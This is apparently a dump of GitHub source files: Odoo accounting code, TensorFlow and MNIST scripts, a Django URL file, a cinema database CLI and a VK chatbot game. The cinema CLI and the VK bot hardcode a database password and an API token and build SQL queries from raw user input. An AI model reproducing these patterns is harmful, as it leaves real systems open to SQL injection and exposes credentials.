line.id, {'name': to_write['payment_reference']}))\n move.write(to_write)\n\n for move in to_post:\n if move.is_sale_document() \\\n and move.journal_id.sale_activity_type_id \\\n and (move.journal_id.sale_activity_user_id or move.invoice_user_id).id not in (self.env.ref('base.user_root').id, False):\n move.activity_schedule(\n date_deadline=min((date for date in move.line_ids.mapped('date_maturity') if date), default=move.date),\n activity_type_id=move.journal_id.sale_activity_type_id.id,\n summary=move.journal_id.sale_activity_note,\n user_id=move.journal_id.sale_activity_user_id.id or move.invoice_user_id.id,\n )\n\n customer_count, supplier_count = defaultdict(int), defaultdict(int)\n for move in to_post:\n if move.is_sale_document():\n customer_count[move.partner_id] += 1\n elif move.is_purchase_document():\n supplier_count[move.partner_id] += 1\n for partner, count in customer_count.items():\n (partner | partner.commercial_partner_id)._increase_rank('customer_rank', count)\n for partner, count in supplier_count.items():\n (partner | partner.commercial_partner_id)._increase_rank('supplier_rank', count)\n\n # Trigger action for paid invoices in amount is zero\n to_post.filtered(\n lambda m: m.is_invoice(include_receipts=True) and m.currency_id.is_zero(m.amount_total)\n ).action_invoice_paid()\n\n # Force balance check since nothing prevents another module to create an incorrect entry.\n # This is performed at the very end to avoid flushing fields before the whole processing.\n to_post._check_balanced()\n return to_post\n","repo_name":"farmaciasaguascalientes/fciags","sub_path":"modulos/zublime_invoicing_pos_global/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":7391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"29723907581","text":"import tensorflow as tf\n# 数据集相关\nPATH2RECORD = '/home/uryuo/db/ntire/tfRecord/' # 将数据集转 tfrecord 位置\n# 原始图片 glob 路径\nIMG_HAZE_GT_PATH = '/home/uryuo/db/ntire/image/haze_1/indoor/trainGT/*.jpg'\nIMG_HAZE_NOISE_PATH = '/home/uryuo/db/ntire/image/haze_1/indoor/trainHaze/*.jpg'\nIMG_HAZE_VAILD_PATH = '/home/uryuo/db/ntire/image/haze_1/indoor/validateHaze/*.png'\n# tfrecord 命名\nRECORD_TRAIN_NAME = 'haze_1_train.tfrecord'\nRECORD_VAILD_NAME = 'haze_1_vaild.tfrecord'\n# record验证图片存储LUJING\nRECORD_ALIABLE_PATH = 'resource/'\n# trainning\nTRAIN_BATCH = 64\n# network\nIMG_CROP_SIZE = [512, 512, 3]\nINPUT_SIZE = [512, 512, 3]\n\n\n# limit gpu mem useage\ndef gpu_option():\n gpu_options = tf.GPUOptions(allow_growth=True)\n return tf.ConfigProto(gpu_options=gpu_options)\n","repo_name":"okingjerryo/deep_model_experiment","sub_path":"dehazeExperment/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"42404164171","text":"import asyncio\nfrom queue import PriorityQueue\nfrom queue import Queue\nfrom time import time\n\n\nclass ReporterManager:\n def __append(self, reporter):\n index = len(self.__reporters)\n self.__reporters.append(reporter)\n return index\n\n def listen_to(self, reporter):\n index = self.__append(reporter)\n report_at = int(time()) + reporter.interval()\n self.__put(report_at, index)\n\n def add_nop(self, reporter):\n index = self.__append(reporter)\n self.__put_nop(index)\n\n def __reporter(self, index):\n return self.__reporters[index]\n\n def __put(self, report_at, index):\n self.__reporter_queue.put((report_at, index))\n\n def __get(self):\n return self.__reporter_queue.get()\n\n def __empty(self):\n return self.__reporter_queue.empty()\n\n def __put_nop(self, index):\n self.__reporter_nop_queue.put_nowait(index)\n\n def __get_nop(self):\n return self.__reporter_nop_queue.get_nowait()\n\n def __empty_nop(self):\n return self.__reporter_nop_queue.empty()\n\n def __size_nop(self):\n return self.__reporter_nop_queue.qsize()\n\n def __check_nop_queue(self):\n if self.__empty_nop():\n return\n\n nop_size = self.__size_nop()\n for i in range(nop_size):\n index = self.__get_nop()\n reporter = self.__reporter(index)\n if reporter.interval() > 0:\n report_at = int(time()) + reporter.interval()\n self.__put(report_at, index)\n else:\n self.__put_nop(index)\n\n async def __async_loop(self, timeout=None):\n if timeout is not None:\n started_at = int(time())\n\n self.__curr_task = asyncio.current_task()\n while not self.__quit_requested:\n self.__check_nop_queue()\n if self.__empty():\n await asyncio.sleep(Const.SLEEP_NO_REPORT_SEC)\n continue\n\n now = int(time())\n (report_at, index) = self.__get()\n reporter = self.__reporter(index)\n\n if (timeout is not None\n and max(now, report_at) - started_at >= timeout):\n break\n\n if reporter.interval() <= 0:\n self.__put_nop(index)\n if self.__empty():\n await asyncio.sleep(Const.SLEEP_NO_REPORT_SEC)\n continue\n\n if report_at >= now:\n await asyncio.sleep(report_at - now)\n [report, alarm] = reporter.report()\n self.__report_queue.push(report)\n if alarm is not None:\n self.__alarm_queue.push(alarm)\n\n self.__put(report_at + reporter.interval(), index)\n\n def start_loop(self, timeout=None):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n try:\n loop.run_until_complete(self.__async_loop(timeout))\n except:\n pass\n\n def request_stop(self):\n self.__quit_requested = True\n self.__curr_task.cancel()\n\n def __init__(self, report_queue, alarm_queue):\n self.__reporter_queue = PriorityQueue()\n self.__reporter_nop_queue = Queue()\n self.__report_queue = report_queue\n self.__reporters = []\n self.__alarm_queue = alarm_queue\n self.__quit_requested = False\n","repo_name":"atmark-techno/Azure-IoT-samples","sub_path":"Armadillo-IoT_GW/modules/lib/reporter_manager.py","file_name":"reporter_manager.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
+{"seq_id":"4477525989","text":"# written by aditya sharma\n# taken from https://www.datacamp.com/community/tutorials/cnn-tensorflow-python\n\n\n# Import libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n#matplotlib inline\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" #for training on gpu\n\n#loading training data\ndata = input_data.read_data_sets('data/MNIST/',one_hot=True)\n\n# reshaping images\ntrain_X = data.train.images.reshape(-1, 28, 28, 1)\ntest_X = data.test.images.reshape(-1, 28, 28, 1)\n\ntrain_y = data.train.labels\ntest_y = data.test.labels\n\n#defining hyper parameters\ntraining_iters = 1\nlearning_rate = 0.001\nbatch_size = 32\n\n#MNIST data input (img shape: 28*28)\nn_input = 28\n\n#MNIST total classes (0-9 digits)\nn_classes = 10\n\n#defining input and output placeholders\nx = tf.placeholder(\"float\", [None, 28,28,1])\ny = tf.placeholder(\"float\", [None, n_classes])\n\ndef conv2d(x, W, b, strides=1):\n # Conv2D wrapper, with bias and relu activation\n x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')\n x = tf.nn.bias_add(x, b)\n return tf.nn.relu(x)\n\ndef maxpool2d(x, k=2):\n # Max filter\n return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1],padding='SAME')\n\n#defining Lorentzian activation functions\ndef activationLorentz(x, x0, lambd):\n return (0.5*lambd)/(np.pi * (np.square(x - x0) + np.square(0.5*lambd)))\n\ndef activationDerivLorentz(x, x0, lambd):\n return (-16*lambd*(x - x0))/(np.pi * np.square(4*np.square(x - x0) + lambd**2)) \n\n\n#defining weights\nweights = {\n 'wc1': tf.get_variable('W0', shape=(3,3,1,32), initializer=tf.contrib.layers.xavier_initializer()), \n 'wc2': tf.get_variable('W1', shape=(3,3,32,64), initializer=tf.contrib.layers.xavier_initializer()), \n 'wc3': tf.get_variable('W2', shape=(3,3,64,128), initializer=tf.contrib.layers.xavier_initializer()), \n 'wd1': tf.get_variable('W3', shape=(4*4*128,128), initializer=tf.contrib.layers.xavier_initializer()), \n 'out': tf.get_variable('W6', shape=(128,n_classes), initializer=tf.contrib.layers.xavier_initializer()), \n}\nbiases = {\n 'bc1': tf.get_variable('B0', shape=(32), initializer=tf.contrib.layers.xavier_initializer()),\n 'bc2': tf.get_variable('B1', shape=(64), initializer=tf.contrib.layers.xavier_initializer()),\n 'bc3': tf.get_variable('B2', shape=(128), initializer=tf.contrib.layers.xavier_initializer()),\n 'bd1': tf.get_variable('B3', shape=(128), initializer=tf.contrib.layers.xavier_initializer()),\n 'out': tf.get_variable('B4', shape=(10), initializer=tf.contrib.layers.xavier_initializer()),\n}\n\ndef conv_net(x, weights, biases): \n\n # here we call the conv2d function we had defined above and pass the input image x, weights wc1 and bias bc1.\n conv1 = conv2d(x, weights['wc1'], biases['bc1'])\n # Max Pooling (down-sampling), this chooses the max value from a 2*2 matrix window and outputs a 14*14 matrix.\n conv1 = maxpool2d(conv1, k=2)\n\n # Convolution Layer\n # here we call the conv2d function we had defined above and pass the input image x, weights wc2 and bias bc2.\n conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])\n # Max Pooling (down-sampling), this chooses the max value from a 2*2 matrix window and outputs a 7*7 matrix.\n conv2 = maxpool2d(conv2, k=2)\n\n conv3 = conv2d(conv2, weights['wc3'], biases['bc3'])\n # Max Pooling (down-sampling), this chooses the max value from a 2*2 matrix window and outputs a 4*4.\n conv3 = maxpool2d(conv3, k=2)\n\n # Fully connected layer\n # Reshape conv2 output to fit fully connected layer input\n fc1 = tf.reshape(conv3, [-1, weights['wd1'].get_shape().as_list()[0]])\n fc1 = tf.add(tf.matmul(fc1, weights['wd1']), biases['bd1'])\n fc1 = tf.nn.relu(fc1)\n # Output, class prediction\n # finally we multiply the fully connected layer with the weights and add a bias term. \n out = tf.add(tf.matmul(fc1, weights['out']), biases['out'])\n return out\n\n# passing input through network\npred = conv_net(x, weights, biases)\n# computing cost function\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\n# using adam optimizer to update weights and biases\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n#Here you check whether the index of the maximum value of the predicted image is equal to the actual labelled image. and both will be a column vector.\ncorrect_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\n\n#calculate accuracy across all the given images and average them out. \naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init) \n train_loss = []\n test_loss = []\n train_accuracy = []\n test_accuracy = []\n # training\n for i in range(training_iters):\n for batch in range(len(train_X)//batch_size):\n batch_x = train_X[batch*batch_size:min((batch+1)*batch_size,len(train_X))]\n batch_y = train_y[batch*batch_size:min((batch+1)*batch_size,len(train_y))] \n # Run optimization op (backprop).\n # Calculate batch loss and accuracy\n opt = sess.run(optimizer, feed_dict={x: batch_x,\n y: batch_y})\n loss, acc = sess.run([cost, accuracy], feed_dict={x: batch_x,\n y: batch_y})\n\n # Calculate accuracy for all 10000 mnist test images\n test_acc,valid_loss = sess.run([accuracy,cost], feed_dict={x: test_X,\n y : test_y})\n train_loss.append(loss)\n test_loss.append(valid_loss)\n train_accuracy.append(acc)\n test_accuracy.append(test_acc)\n print(\"Validation Loss: \" + str(valid_loss))","repo_name":"bendavidsteel/final-year-project","sub_path":"Misc/convneuralnetwork.py","file_name":"convneuralnetwork.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"27818196072","text":"import psycopg2\nimport sys\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef main():\n\n\tmovieIndexQuery= \"\"\"CREATE INDEX employeeNames ON Employee(name);\"\"\"\n\n\t#connect to database\n\tpassw = \"Cinema2078\"\n\t#print(\"please enter the password for cs421g78:\")\n\t#pw= str(input())\n\tconnection = psycopg2.connect(user=\"cs421g78\",\n\t\tpassword=passw,\n\t\thost=\"comp421.cs.mcgill.ca\",\n\t\tport=\"5432\",\n\t\tdatabase=\"cs421\")\n\tprint(\"Welcome to the CinemaClub Databse Interace\")\n\tprint(\"\")\n\tdisplay_menu()\n\n\twhile(1): #infinite loop for user inputs \n\t\tprint(\"Input:\", end=\" \")\n\t\tuse_in= str(input())\n\t\tif(use_in==\"\"):\n\t\t\tprint(\"Invalid Input, please try again\")\n\t\t\tcontinue\n\t\telif(int(use_in)==0): #prompted menu to be displayed \n\t\t\tdisplay_menu()\n\t\telif(int(use_in)==10): # prompted exit \n\t\t\texit_prog(connection)\n\n\t\telif(int(use_in)==1):\n\t\t\tprocessOne(connection)\n\t\t\tprint('Do you wish to continue? (Y/N)')\n\t\t\texitq=input()\n\t\t\tif exitq=='N':\n\t\t\t\texit_prog(connection)\n\t\t\telse:\n\t\t\t\tdisplay_menu()\n\n\t\telif(int(use_in)==2):\n\t\t\tprocessTwo(connection)\n\t\t\tprint('Do you wish to continue? (Y/N)')\n\t\t\texitq=input()\n\t\t\tif exitq=='N':\n\t\t\t\texit_prog(connection)\n\t\t\telse:\n\t\t\t\tdisplay_menu()\n\n\t\telif(int(use_in)==3):\n\t\t\tprocessThree(connection)\n\t\t\tprint('Do you wish to continue? (Y/N)')\n\t\t\texitq=input()\n\t\t\tif exitq=='N':\n\t\t\t\texit_prog(connection)\n\t\t\telse:\n\t\t\t\tdisplay_menu()\n\n\t\telif(int(use_in)==4):\n\t\t\tprocessFour(connection)\n\t\t\tprint('Do you wish to continue? (Y/N)')\n\t\t\texitq=input()\n\t\t\tif exitq=='N':\n\t\t\t\texit_prog(connection)\n\t\t\telse:\n\t\t\t\tdisplay_menu()\n\n\t\telif(int(use_in)==5):\n\t\t\tprocessFive(connection)\n\t\t\tprint('Do you wish to continue? (Y/N)')\n\t\t\texitq=input()\n\t\t\tif exitq=='N':\n\t\t\t\texit_prog(connection)\n\t\t\telse:\n\t\t\t\tdisplay_menu()\n\t\telse:\n\t\t\tprint(\"Invalid Input, please try again\")\n\n\ndef processOne(connection): #Make a New Employee\n\tprint(\"What is their name?\")\n\tnew_name= str(input())\n\t#new_name= \"Aleks\"\n\tprint(\"What is their address?\")\n\tnew_add= str(input())\n\t#new_add= \"3434 St. Famille\" \n\tprint(\"What is their new email?\")\n\tnew_email= str(input())\n\t#new_email= \"avm@avm.ca\"\n\tprint(\"Where do they work? please enter a cid\")\n\tnew_cid= str(input())\n\t#new_cid= \"1461\"\n\tprint(\"What is new employeeID?\")\n\tnew_eid= str(input())\n\t#new_eid= \"11111\"\n\tprint(\"What is their starting salary?\")\n\tnew_sal= str(input())\n\t#new_sal= \"500000\"\n\tQuery =\"INSERT INTO employee(eid, cid, name, email, salary, address) VALUES('\"\n\tQuery_with_val = Query+new_eid+\"', '\"+new_cid+\"', '\"+new_name+\"', '\"+new_email+\"','\"+new_sal+\"', '\"+new_add+\"') RETURNING eid;\"\n\t#dat1 = pd.read_sql_query(Query_fin, connection)\n\tdat1 = pd.read_sql_query(Query_with_val, connection)\n\tdat1.set_index(['eid'])\n\tprint(dat1)\n\tprint(Query_with_val)\n\n\n#confirmed works\ndef processTwo(connection): #What movie titles are screening on this date\n\tprint(\"What is the date you would like to select\")\n\tin_date =str(input())\n\t#in_date =\"2121-02-01\"\n\tquery = \"SELECT name, date from screening s, movie m where s.movieid = m.movieid and date ='2121-02-01'\"\n\tq_input = \"SELECT name from screening s, movie m where s.movieid = m.movieid and date =\"\n\tq_fin = q_input+\"'\"+in_date+\"';\"\n\n\tdat1 = pd.read_sql_query(q_fin, connection)\n\tdat1.set_index(['name'])\n\tprint(\"Movie Titles:\\n\")\n\tprint(dat1)\n\tprint(q_fin)\n\n\n#confirmed works\ndef processThree(connection): #How many cinemas are have screened a movie\n\tprint(\"What movie are you looking for?\")\n\tmovie =str(input())\n\t#movie =\"quis urna. Nunc quis arcu\"\n\tquery = \"SELECT count(cid) from screening s, movie m where m.name like '%\"+movie+\"%' and m.movieid=s.movieid\"\n\n\tdat1 = pd.read_sql_query(query, connection)\n\tprint(dat1)\n\tprint(\"Number of cinemas that screened the movie:\\n\")\n\tprint(dat1['count'][0])\n\tprint(query)\n\n\ndef processFour(connection): # How many Items has a customer purchased the\n\tprint(\"Email of the customer?\")\n\temail =str(input())\n\t#email='Quisque@sodales.co.uk'\n\tquery=\"SELECT SUM(quantity) from orders o, customer c where o.custid=c.custid and c.custemail='\"+email+\"'\"\n\tdat1 = pd.read_sql_query(query, connection)\n\tprint('Total items bought')\n\tprint(dat1['sum'][0])\n\tprint(query)\n\ndef processFive(connection): #Show which cinemas have a room larger than 260 seats\n\n\tprint(\"What size of room are you looking for?\")\n\tcap=input()\n\t#cap=280\n\tquery= \"\"\"select address, nbr as room_nb, capacity from cinema c, room r\n\t\t\twhere c.cid=r.cid \n\t\t\tand r.capacity > \"\"\"+str(cap)\n\n\tdat1 = pd.read_sql_query(query, connection)\n\tprint(dat1.keys())\n\tdat1.set_index(['address', 'room_nb', 'capacity'])\n\tprint(\"Cinemas:\\n\")\n\tprint(dat1)\n\tprint(query)\n\n\n\ndef exit_prog(connection):\n\t#close connection to database\n\tconnection = None\n\tprint(\"Exiting Program\")\n\tsys.exit()\n\n\ndef display_menu():\n\tprint(\"-----------------Program Menu-----------------\")\n\tprint(\"Enter the associted number to begin a process:\")\t\n\tprint(\"0: Redisplay Menu\")\n\tprint(\"1: Create a new Employee\")\n\tprint(\"2: What movie screenings are on this date\")\n\tprint(\"3: How many cinemas are have screened a certain movie\")\n\tprint(\"4: How many Items has a customer purchased \")\n\tprint(\"5: Show which cinemas have a room larger than x seats\")\n\tprint(\"10: Exit Program\")\n\nmain()\n","repo_name":"AleksasMurauskas/COMP421Project3","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"18757883262","text":"from django.conf.urls import patterns, include, url\n#from django.views.generic.base import TemplateView\nfrom django.http import HttpResponse\nfrom settings import MEDIA_ROOT\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n #url(r'^pic/(?P.*)$', 'util.web_helpers.pic_csrf.pic_csrf', name='pic_csrf'),\n #url(r'^$', 'apps.cc.views.index', name='index'),\n url(r'^$', 'apps.cc.views.index', name='index'),\n url(r'^api$', 'apps.cc.views.api', name='api'),\n url(r'^url/(?P\\d+)/delete$', 'apps.cc.views.delete', name='delete'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n url(r'^500/$', 'util.web_helpers.error_page.server_error_500', name='server_error_500'),\n url(r'^404/$', 'util.web_helpers.error_page.server_error_404', name='server_error_404'),\n url(r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': MEDIA_ROOT }),\n url(r'^robots\\.txt$', lambda r: HttpResponse(\"User-agent: *\\nDisallow: /\", mimetype=\"text/plain\")),\n)\n\nhandler404 = 'util.web_helpers.error_page.server_error_404'\nhandler404 = 'util.web_helpers.error_page.server_error_500'","repo_name":"giveme168/zhiqu","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"43600054775","text":"import vk_api\nfrom random import randint\nimport keyboards_main\nimport time\nimport methods\nimport sql_connect\n\nstart_time = time.time()\ntoken = \"vk1.a.-1Nd_H3CRuKOQfBtctmLINsMx6CWFAD-WrdhgaZ0Hryr9DXUP7RXFxlspYtt-J05daqNQnKtEoR15u2IEQcmOVPH2gKe8YnFwbzIKtjmKHNyt6sE0Bi_TMet1MvpN82aF6NbiFuI3Iw2xhAXaXMT_aEKvt76egb0jZM20frQhkVgwD85xhk0n9mWJWLv9-c45D_aXHz_n7xYRAGW6kXCxg\"\nvk = vk_api.VkApi(token=token)\nvk._auth_token()\nb = 0\n\n\ndef writing(print_text, us_id, k_b):\n global b\n a = (vk.method(\"messages.send\", {\"user_id\": us_id, \"message\": print_text, \"random_id\": randint(1, 1000),\n \"keyboard\": k_b.get_keyboard()}))\n while a < b:\n print('Ошибка отправки')\n a = (vk.method(\"messages.send\", {\"user_id\": us_id, \"message\": print_text, \"random_id\": randint(1, 1000),\n \"keyboard\": k_b.get_keyboard()}))\n b = a\n\n\ndef writing_only_text(print_text, us_id):\n global b\n a = (vk.method(\"messages.send\", {\"user_id\": us_id, \"message\": print_text, \"random_id\": randint(1, 1000)}))\n while a < b:\n print('Ошибка отправки')\n a = (vk.method(\"messages.send\", {\"user_id\": us_id, \"message\": print_text, \"random_id\": randint(1, 1000)}))\n b = a\n\n\ndef searching_in_db(vk_id):\n return sql_connect.db_connection_select(f'SELECT * FROM users WHERE vk_id = {vk_id} LIMIT 1;')\n\n\ndef return_ammunition_text(us_id, vk_id):\n generated_string = ''\n for work_line in sql_connect.db_connection_select_tuple(f'SELECT durability_left, (SELECT deffence FROM ammunition '\n f'WHERE id = ammunition_id), (SELECT attack FROM '\n f'ammunition WHERE id = ammunition_id), '\n f'(SELECT durability FROM ammunition WHERE id = '\n f'ammunition_id), (SELECT name FROM ammunition WHERE id = '\n f'ammunition_id) FROM ammunition_users WHERE user_id = '\n f'{us_id};'):\n var_string = f'{work_line[4]}: \\nатака = {work_line[2]}\\nзащита = {work_line[1]}\\nПрочность = {work_line[0]}/' \\\n f'{work_line[3]}\\n\\n'\n generated_string += var_string\n writing('В инвентаре у игрока лежат следующие артефакты:\\n\\n' + generated_string, vk_id, keyboards_main.keyboard_4)\n\n\ndef shop(us_id, vk_id):\n if sql_connect.db_connection_select(f'SELECT id FROM shop WHERE location_id = (SELECT location_id FROM users '\n f'WHERE id = {us_id})') is not None:\n player.part = 'shop'\n generated_string = ''\n kb_list = ['Меню']\n for line_1 in shop_request(us_id):\n var_string = f'{line_1[0]}: \\nатака = {line_1[1]} \\nзащита = {line_1[2]}\\nПрочность: {line_1[3]}\\nЦена: ' \\\n f'{line_1[4]}\\n\\n'\n generated_string += var_string\n kb_list.append(line_1[0])\n writing(\"Содержимое первой страницы магазина:\\n\\n\" + generated_string,\n vk_id, keyboards_main.new_keyboard(kb_list))\n\n else:\n writing('Некорректное значение, выбери пункт меню.', user_id,\n keyboards_main.keyboard_3)\n\n\ndef buying_ammunition(us_id, work_text, vk_id):\n working_price = sql_connect.db_connection_select(f\"SELECT price FROM ammunition WHERE name = '{work_text}';\")\n if player.money >= working_price[0]:\n sql_connect.db_connection_insert(f\"INSERT INTO ammunition_users (user_id, ammunition_id, durability_left) \"\n f\"VALUES ({us_id}, (SELECT id FROM ammunition WHERE name = '{work_text}'), \"\n f\"(SELECT durability FROM ammunition WHERE id = (SELECT id FROM ammunition \"\n f\"WHERE name = '{work_text}')));\")\n player.money -= working_price[0]\n writing_only_text(f'Герой приобрёл {work_text}', vk_id)\n else:\n writing_only_text('К сожалению у тебя недостаточно средств на приобретение данного артефакта(', vk_id)\n\n\ndef shop_request(us_id):\n return sql_connect.db_connection_select_tuple(f'SELECT name, attack, deffence, durability, price FROM ammunition '\n f'WHERE id IN (SELECT ammunition_id FROM ammunition_shop WHERE '\n f'shop_id = (SELECT id FROM shop WHERE location_id = (SELECT '\n f'location_id FROM users WHERE id = {us_id})));')\n\n\nclass Player:\n room = 1\n part = 'main'\n\n def __init__(self, name, vk_id, player_id, country, level, location_id, race, born, experience, money, mem_time):\n self.name = name\n self.vk_id = vk_id\n self.id = player_id\n self.country = country\n self.level = level\n self.location_id = location_id\n self.race = race\n self.born = born\n self.experience = experience\n self.money = money\n self.mem_time = mem_time\n\n\nclass PlayerInRegistration:\n name = ''\n country = ''\n location = ''\n race = ''\n room = 1\n\n def __init__(self, vk_id, mem_time):\n self.vk_id = vk_id\n self.mem_time = mem_time\n\n\nplayers = []\nlist_of_players_id = []\n\nwhile True:\n try:\n messages = vk.method(\"messages.getConversations\", {\"offset\": 0, \"count\": 20, \"filter\": \"unanswered\"})\n print(\"%s секунд на цикл\" % (time.time() - start_time))\n start_time = time.time()\n if messages[\"count\"] >= 1:\n for message in range(messages[\"count\"]):\n text = messages['items'][message]['last_message']['text']\n user_id = messages['items'][message]['last_message']['from_id']\n if user_id not in list_of_players_id:\n user_now = searching_in_db(int(f'{user_id}'))\n if user_now is None:\n if text == \"Регистрация\":\n print('регистрация игрока в базе данных')\n players.append(PlayerInRegistration(user_id, time.time()))\n list_of_players_id.append(user_id)\n writing_only_text('Введи своё игровое имя', user_id)\n else:\n writing_only_text(\"Введи 'Регистрация', начнём твою регистрацию в игре\", user_id)\n else:\n list_of_players_id.append(user_now[2])\n print(list_of_players_id)\n players.append(\n Player(user_now[1], user_now[2], user_now[0], user_now[3], user_now[6], user_now[7],\n user_now[5], user_now[4], user_now[8], user_now[9], time.time()))\n writing(\"Основная страница героя, меню\", user_id, keyboards_main.keyboard_3)\n elif user_id in list_of_players_id:\n for player in players:\n if player.vk_id == user_id:\n player.mem_time = time.time()\n if type(player) == PlayerInRegistration:\n if player.room == 1:\n player.name = text\n player.room = 2\n writing('Выбери страну', user_id, keyboards_main.keyboard_0)\n elif player.room == 2:\n if text == 'Империя':\n player.country = 'Империя'\n player.location = 1\n player.room = 3\n writing('Выбери расу', user_id, keyboards_main.keyboard_1)\n elif text == 'Королевство':\n player.country = 'Королевство'\n player.location = 2\n player.room = 3\n writing('Выбери расу', user_id, keyboards_main.keyboard_1)\n else:\n writing('Некорректное значение, выбери страну.', user_id,\n keyboards_main.keyboard_0)\n elif player.room == 3:\n if text == 'Эльф':\n player.race = 'Эльф'\n player.room = 4\n writing('переходим в основную игру', user_id, keyboards_main.keyboard_2)\n elif text == 'Гном':\n player.race = 'Гном'\n player.room = 4\n writing('переходим в основную игру', user_id, keyboards_main.keyboard_2)\n else:\n writing('Некорректное значение, выбери расу.', user_id,\n keyboards_main.keyboard_1)\n elif player.room == 4:\n if text == 'Продолжить':\n sql_connect.db_connection_insert(f'INSERT users (name, vk_id, country, race, '\n f'location_id) VALUES (\"{player.name}\", '\n f'{player.vk_id}, \"{player.country}\",'\n f'\"{player.race}\", {player.location});')\n for i in range(len(list_of_players_id)):\n if list_of_players_id[i] == user_id:\n list_of_players_id.pop(i)\n for i in range(len(players)):\n if players[i].vk_id == user_id:\n players.pop(i)\n else:\n if player.part == 'main':\n if player.room == 1:\n if text == 'Карта':\n player.part = 'map'\n writing(\"Герой зашёл в карту\", user_id, keyboards_main.keyboard_5)\n elif text == 'Инвентарь':\n player.part = 'inventory'\n writing(\"Герой зашёл в инвентарь\", user_id, keyboards_main.keyboard_4)\n elif text == \"Магазин\":\n writing_only_text('Герой зашёл в магазин. \\n', user_id)\n shop(player.id, user_id)\n else:\n writing('Некорректное значение, выбери пункт меню.', user_id,\n keyboards_main.keyboard_3)\n elif player.part == 'shop':\n if player.room == 1:\n if text == 'Меню':\n writing(\"Основная страница героя, меню\", user_id, keyboards_main.keyboard_3)\n player.part = 'main'\n else:\n for line in shop_request(player.id):\n if text == line[0]:\n buying_ammunition(player.id, text, user_id)\n\n shop(player.id, user_id)\n elif player.part == 'inventory':\n if player.room == 1:\n if text == 'Меню':\n writing(\"Основная страница героя, меню\", user_id, keyboards_main.keyboard_3)\n player.part = 'main'\n elif text == 'Оружие':\n return_ammunition_text(player.id, user_id)\n else:\n writing('Некорректное значение, выбери пункт меню.', user_id,\n keyboards_main.keyboard_4)\n elif player.part == 'map':\n if player.room == 1:\n if text == 'Меню':\n writing(\"Основная страница героя, меню\", user_id, keyboards_main.keyboard_3)\n player.part = 'main'\n elif text == 'Квест':\n ls, w_str = methods.quests_list(user_id, player.id)\n writing(w_str, user_id, keyboards_main.new_keyboard(ls))\n player.part = 'quest'\n else:\n writing('Некорректное значение, выбери пункт меню.', user_id,\n keyboards_main.keyboard_5)\n elif player.part == 'quest':\n if player.room == 1:\n if text == '':\n pass\n else:\n writing('Некорректное значение, выбери пункт меню.', user_id,\n keyboards_main.keyboard_5)\n else:\n var_1 = 0\n for i in range(len(players)):\n if time.time() - players[i - var_1].mem_time >= 300:\n sql_connect.db_connection_insert(f'UPDATE users SET level_ = {players[i - var_1].level}, '\n f'location_id = {players[i - var_1].location_id}, experience = '\n f'{players[i - var_1].experience}, money = '\n f'{players[i - var_1].money} WHERE id = {players[i - var_1].id};')\n print(f'Удаляем игрока {players[i - var_1].name} из оперативной памяти')\n list_of_players_id.remove(players[i - var_1].vk_id)\n players.pop(i - var_1)\n print(players)\n print(list_of_players_id)\n var_1 += 1\n except vk_api.exceptions.ApiError or ConnectionError or vk_api.exceptions.ApiHttpError:\n pass\n","repo_name":"3ovutVanja/ChatBotGameFantasy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16300,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"23973795946","text":"# 3. Узнайте у пользователя число n.\n# Найдите сумму чисел n + nn + nnn.\n# Например, пользователь ввёл число 3. Считаем 3 + 33 + 333 = 369.\n\nnumber = input(\"Введите цифру от 0 до 9: \")\ntry:\n if int(number) in range(10):\n print(int(number) + int(number * 2) + int(number * 3))\n else:\n print(\"Введенная цифра больше вне диапазона от 0 до 9. Попробуйте еще раз\")\nexcept:\n print(\"Вы ввели не цифру. Попробуйте еще раз\")\n","repo_name":"MA32021/gbPythonBasics","sub_path":"Lesson_1_3.py","file_name":"Lesson_1_3.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
